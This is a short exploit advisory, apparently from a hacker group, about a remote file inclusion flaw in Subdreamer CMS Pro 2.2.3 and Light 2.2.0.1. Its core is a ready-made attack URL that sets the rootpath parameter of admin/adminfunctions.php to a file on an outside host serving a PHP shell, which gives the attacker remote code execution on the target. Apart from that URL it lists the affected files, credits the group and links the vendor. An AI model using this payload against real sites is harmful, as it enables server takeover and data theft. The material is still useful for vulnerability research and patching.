Subdreamer CMS (Pro 2.2.3 and Light 2.2.0.1) security bug ;)

Hello world ;)

A serious exploit has recently been discovered which will allow hackers to gain admin access to the
latest versions of Subdreamer CMS (Pro 2.2.3 and Light 2.2.0.1). It is crucial to patch your systems
immediately.

Affected files:
admin/adminfunctions.php
includes/functions.php
includes/globalfunctions.php

=) $rootpath

exploit:
http://target.com/admin/adminfunctions.php?rootpath=http://somesite.com/includes/globalfunctions.php

where "globalfunctions.php" is a php-shell ;)

Vendor info:
http://www.subdreamer.com/forum/showthread.php?p=37279#post37279

All done by JET[CTH] feet B0FH[CTH] ;)
Greets: dm-club, ckt ;)
contact info: [email protected]